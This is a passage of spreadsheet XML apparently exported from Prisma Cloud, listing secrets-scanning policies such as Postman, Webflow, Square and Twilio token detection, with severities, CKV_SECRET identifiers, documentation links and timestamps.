      <c r="V612" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W612" t="inlineStr">
        <is>
          <t>Postman API Key</t>
        </is>
      </c>
      <c r="X612" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-59</t>
        </is>
      </c>
      <c r="Y612" t="inlineStr"/>
      <c r="Z612" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA612" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB612" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC612" t="inlineStr">
        <is>
          <t>CKV_SECRET_59</t>
        </is>
      </c>
      <c r="AD612" t="b">
        <v>1</v>
      </c>
      <c r="AE612" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF612" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>a183a84f-e1f0-4751-bdaa-b3b799ec3dd4</t>
        </is>
      </c>
      <c r="AI612" t="inlineStr"/>
      <c r="AJ612" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK612" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" t="inlineStr"/>
      <c r="B613" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C613" s="2" t="inlineStr"/>
      <c r="D613" t="inlineStr"/>
      <c r="E613" t="inlineStr"/>
      <c r="F613" t="inlineStr"/>
      <c r="G613" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J613" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K613" t="inlineStr">
        <is>
          <t>Webflow API Token detected in code</t>
        </is>
      </c>
      <c r="L613" t="inlineStr"/>
      <c r="M613" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N613" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O613" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P613" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q613" t="inlineStr"/>
      <c r="R613" t="inlineStr"/>
      <c r="S613" t="inlineStr"/>
      <c r="T613" t="b">
        <v>0</v>
      </c>
      <c r="U613" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V613" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W613" t="inlineStr">
        <is>
          <t>Webflow API Token</t>
        </is>
      </c>
      <c r="X613" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-75</t>
        </is>
      </c>
      <c r="Y613" t="inlineStr"/>
      <c r="Z613" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA613" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB613" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC613" t="inlineStr">
        <is>
          <t>CKV_SECRET_75</t>
        </is>
      </c>
      <c r="AD613" t="b">
        <v>1</v>
      </c>
      <c r="AE613" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF613" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>7fc2545b-e320-4d5c-900c-d9218fe286c3</t>
        </is>
      </c>
      <c r="AI613" t="inlineStr"/>
      <c r="AJ613" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK613" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" t="inlineStr"/>
      <c r="B614" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C614" s="2" t="inlineStr"/>
      <c r="D614" t="inlineStr"/>
      <c r="E614" t="inlineStr"/>
      <c r="F614" t="inlineStr"/>
      <c r="G614" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J614" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K614" t="inlineStr">
        <is>
          <t>Square Access Token detected in code</t>
        </is>
      </c>
      <c r="L614" t="inlineStr"/>
      <c r="M614" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N614" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O614" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P614" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q614" t="inlineStr"/>
      <c r="R614" t="inlineStr"/>
      <c r="S614" t="inlineStr"/>
      <c r="T614" t="b">
        <v>0</v>
      </c>
      <c r="U614" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V614" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W614" t="inlineStr">
        <is>
          <t>Square Access Token</t>
        </is>
      </c>
      <c r="X614" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-101</t>
        </is>
      </c>
      <c r="Y614" t="inlineStr"/>
      <c r="Z614" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA614" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB614" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC614" t="inlineStr">
        <is>
          <t>CKV_SECRET_101</t>
        </is>
      </c>
      <c r="AD614" t="b">
        <v>1</v>
      </c>
      <c r="AE614" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF614" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>64507716-736d-486a-8b3a-b2597c6a9f5b</t>
        </is>
      </c>
      <c r="AI614" t="inlineStr"/>
      <c r="AJ614" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK614" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" t="inlineStr"/>
      <c r="B615" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C615" s="2" t="inlineStr"/>
      <c r="D615" t="inlineStr"/>
      <c r="E615" t="inlineStr"/>
      <c r="F615" t="inlineStr"/>
      <c r="G615" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J615" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K615" t="inlineStr">
        <is>
          <t>Braintree Payments Key detected in code</t>
        </is>
      </c>
      <c r="L615" t="inlineStr"/>
      <c r="M615" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N615" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O615" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P615" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q615" t="inlineStr"/>
      <c r="R615" t="inlineStr"/>
      <c r="S615" t="inlineStr"/>
      <c r="T615" t="b">
        <v>0</v>
      </c>
      <c r="U615" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V615" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W615" t="inlineStr">
        <is>
          <t>Braintree Payments Key</t>
        </is>
      </c>
      <c r="X615" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-81</t>
        </is>
      </c>
      <c r="Y615" t="inlineStr"/>
      <c r="Z615" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA615" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB615" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC615" t="inlineStr">
        <is>
          <t>CKV_SECRET_81</t>
        </is>
      </c>
      <c r="AD615" t="b">
        <v>1</v>
      </c>
      <c r="AE615" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF615" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>3bda95fc-4a3e-4d7b-9f88-454c45759d6a</t>
        </is>
      </c>
      <c r="AI615" t="inlineStr"/>
      <c r="AJ615" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK615" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" t="inlineStr"/>
      <c r="B616" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C616" s="2" t="inlineStr"/>
      <c r="D616" t="inlineStr"/>
      <c r="E616" t="inlineStr"/>
      <c r="F616" t="inlineStr"/>
      <c r="G616" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J616" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K616" t="inlineStr">
        <is>
          <t>Python Package Index Key detected in code</t>
        </is>
      </c>
      <c r="L616" t="inlineStr"/>
      <c r="M616" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N616" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O616" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P616" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q616" t="inlineStr"/>
      <c r="R616" t="inlineStr"/>
      <c r="S616" t="inlineStr"/>
      <c r="T616" t="b">
        <v>0</v>
      </c>
      <c r="U616" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V616" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W616" t="inlineStr">
        <is>
          <t>Python Package Index Key</t>
        </is>
      </c>
      <c r="X616" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-61</t>
        </is>
      </c>
      <c r="Y616" t="inlineStr"/>
      <c r="Z616" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA616" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB616" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC616" t="inlineStr">
        <is>
          <t>CKV_SECRET_61</t>
        </is>
      </c>
      <c r="AD616" t="b">
        <v>1</v>
      </c>
      <c r="AE616" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF616" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>ce61d4a3-bc17-494a-86f1-40d26fa73b1f</t>
        </is>
      </c>
      <c r="AI616" t="inlineStr"/>
      <c r="AJ616" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK616" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" t="inlineStr"/>
      <c r="B617" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C617" s="2" t="inlineStr"/>
      <c r="D617" t="inlineStr"/>
      <c r="E617" t="inlineStr"/>
      <c r="F617" t="inlineStr"/>
      <c r="G617" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J617" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K617" t="inlineStr">
        <is>
          <t>Netlify Token detected in code</t>
        </is>
      </c>
      <c r="L617" t="inlineStr"/>
      <c r="M617" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N617" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O617" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P617" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q617" t="inlineStr"/>
      <c r="R617" t="inlineStr"/>
      <c r="S617" t="inlineStr"/>
      <c r="T617" t="b">
        <v>0</v>
      </c>
      <c r="U617" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V617" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W617" t="inlineStr">
        <is>
          <t>Netlify Token</t>
        </is>
      </c>
      <c r="X617" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-53</t>
        </is>
      </c>
      <c r="Y617" t="inlineStr"/>
      <c r="Z617" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA617" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB617" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC617" t="inlineStr">
        <is>
          <t>CKV_SECRET_53</t>
        </is>
      </c>
      <c r="AD617" t="b">
        <v>1</v>
      </c>
      <c r="AE617" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF617" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>516fde21-67e9-4573-bfe7-41f6c5b8f5c0</t>
        </is>
      </c>
      <c r="AI617" t="inlineStr"/>
      <c r="AJ617" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK617" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" t="inlineStr"/>
      <c r="B618" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C618" s="2" t="inlineStr"/>
      <c r="D618" t="inlineStr"/>
      <c r="E618" t="inlineStr"/>
      <c r="F618" t="inlineStr"/>
      <c r="G618" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J618" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K618" t="inlineStr">
        <is>
          <t>DroneCI Token detected in code</t>
        </is>
      </c>
      <c r="L618" t="inlineStr"/>
      <c r="M618" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N618" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O618" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P618" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q618" t="inlineStr"/>
      <c r="R618" t="inlineStr"/>
      <c r="S618" t="inlineStr"/>
      <c r="T618" t="b">
        <v>0</v>
      </c>
      <c r="U618" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V618" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W618" t="inlineStr">
        <is>
          <t>DroneCI Token</t>
        </is>
      </c>
      <c r="X618" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-37</t>
        </is>
      </c>
      <c r="Y618" t="inlineStr"/>
      <c r="Z618" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA618" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB618" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC618" t="inlineStr">
        <is>
          <t>CKV_SECRET_37</t>
        </is>
      </c>
      <c r="AD618" t="b">
        <v>1</v>
      </c>
      <c r="AE618" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF618" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>5686a696-223c-4b07-b5bf-427c780125a9</t>
        </is>
      </c>
      <c r="AI618" t="inlineStr"/>
      <c r="AJ618" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK618" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" t="inlineStr"/>
      <c r="B619" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C619" s="2" t="inlineStr"/>
      <c r="D619" t="inlineStr"/>
      <c r="E619" t="inlineStr"/>
      <c r="F619" t="inlineStr"/>
      <c r="G619" t="b">
        <v>1</v>
      </c>
      <c r="H6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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J619" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K619" t="inlineStr">
        <is>
          <t>SonarQube Token detected in code</t>
        </is>
      </c>
      <c r="L619" t="inlineStr"/>
      <c r="M619" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N619" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O619" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P619" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q619" t="inlineStr"/>
      <c r="R619" t="inlineStr"/>
      <c r="S619" t="inlineStr"/>
      <c r="T619" t="b">
        <v>0</v>
      </c>
      <c r="U619" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V619" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W619" t="inlineStr">
        <is>
          <t>SonarQube Token</t>
        </is>
      </c>
      <c r="X619" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-86</t>
        </is>
      </c>
      <c r="Y619" t="inlineStr"/>
      <c r="Z619" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA619" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB619" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC619" t="inlineStr">
        <is>
          <t>CKV_SECRET_86</t>
        </is>
      </c>
      <c r="AD619" t="b">
        <v>1</v>
      </c>
      <c r="AE619" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF619" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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19" t="inlineStr">
        <is>
          <t>56a05c06-5f98-4534-b6f4-8b8d4777fc0a</t>
        </is>
      </c>
      <c r="AI619" t="inlineStr"/>
      <c r="AJ619" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK619" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" t="inlineStr"/>
      <c r="B620" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C620" s="2" t="inlineStr"/>
      <c r="D620" t="inlineStr"/>
      <c r="E620" t="inlineStr"/>
      <c r="F620" t="inlineStr"/>
      <c r="G620" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J620" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K620" t="inlineStr">
        <is>
          <t>Azure Machine Learning web service API key detected in code</t>
        </is>
      </c>
      <c r="L620" t="inlineStr"/>
      <c r="M620" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N620" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O620" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P620" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q620" t="inlineStr"/>
      <c r="R620" t="inlineStr"/>
      <c r="S620" t="inlineStr"/>
      <c r="T620" t="b">
        <v>0</v>
      </c>
      <c r="U620" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V620" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W620" t="inlineStr">
        <is>
          <t>Azure Machine Learning web service API key</t>
        </is>
      </c>
      <c r="X620" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-115</t>
        </is>
      </c>
      <c r="Y620" t="inlineStr"/>
      <c r="Z620" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA620" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB620" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC620" t="inlineStr">
        <is>
          <t>CKV_SECRET_115</t>
        </is>
      </c>
      <c r="AD620" t="b">
        <v>1</v>
      </c>
      <c r="AE620" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF620" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>f80d9a84-fb3a-4458-8a74-8a2fd8d844d7</t>
        </is>
      </c>
      <c r="AI620" t="inlineStr"/>
      <c r="AJ620" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK620" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" t="inlineStr"/>
      <c r="B621" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C621" s="2" t="inlineStr"/>
      <c r="D621" t="inlineStr"/>
      <c r="E621" t="inlineStr"/>
      <c r="F621" t="inlineStr"/>
      <c r="G621" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J621" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K621" t="inlineStr">
        <is>
          <t>Azure Functions HTTP Trigger Key detected in code</t>
        </is>
      </c>
      <c r="L621" t="inlineStr"/>
      <c r="M621" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N621" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O621" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P621" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q621" t="inlineStr"/>
      <c r="R621" t="inlineStr"/>
      <c r="S621" t="inlineStr"/>
      <c r="T621" t="b">
        <v>0</v>
      </c>
      <c r="U621" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V621" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W621" t="inlineStr">
        <is>
          <t>Azure Functions HTTP Trigger Key</t>
        </is>
      </c>
      <c r="X621" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-112</t>
        </is>
      </c>
      <c r="Y621" t="inlineStr"/>
      <c r="Z621" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA621" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB621" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC621" t="inlineStr">
        <is>
          <t>CKV_SECRET_112</t>
        </is>
      </c>
      <c r="AD621" t="b">
        <v>1</v>
      </c>
      <c r="AE621" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF621" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>4347180a-7d5c-44f9-8ba2-2887afd88ae0</t>
        </is>
      </c>
      <c r="AI621" t="inlineStr"/>
      <c r="AJ621" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK621" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" t="inlineStr"/>
      <c r="B622" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C622" s="2" t="inlineStr"/>
      <c r="D622" t="inlineStr"/>
      <c r="E622" t="inlineStr"/>
      <c r="F622" t="inlineStr"/>
      <c r="G622" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J622" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K622" t="inlineStr">
        <is>
          <t>Twilio Access Key detected in code</t>
        </is>
      </c>
      <c r="L622" t="inlineStr"/>
      <c r="M622" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N622" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O622" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P622" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q622" t="inlineStr"/>
      <c r="R622" t="inlineStr"/>
      <c r="S622" t="inlineStr"/>
      <c r="T622" t="b">
        <v>0</v>
      </c>
      <c r="U622" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V622" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W622" t="inlineStr">
        <is>
          <t>Twilio Access Key</t>
        </is>
      </c>
      <c r="X622" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-18</t>
        </is>
      </c>
      <c r="Y622" t="inlineStr"/>
      <c r="Z622" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA622" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB622" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC622" t="inlineStr">
        <is>
          <t>CKV_SECRET_18</t>
        </is>
      </c>
      <c r="AD622" t="b">
        <v>1</v>
      </c>
      <c r="AE622" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF622" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>b72b7eaf-c8b9-4711-a646-6bb6aca7f922</t>
        </is>
      </c>
      <c r="AI622" t="inlineStr"/>
      <c r="AJ622" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK622" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" t="inlineStr"/>
      <c r="B623" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C623" s="2" t="inlineStr"/>
      <c r="D623" t="inlineStr"/>
      <c r="E623" t="inlineStr"/>
      <c r="F623" t="inlineStr"/>
      <c r="G623" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J623" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K623" t="inlineStr">
        <is>
          <t>Braintree Access Token detected in code</t>
        </is>
      </c>
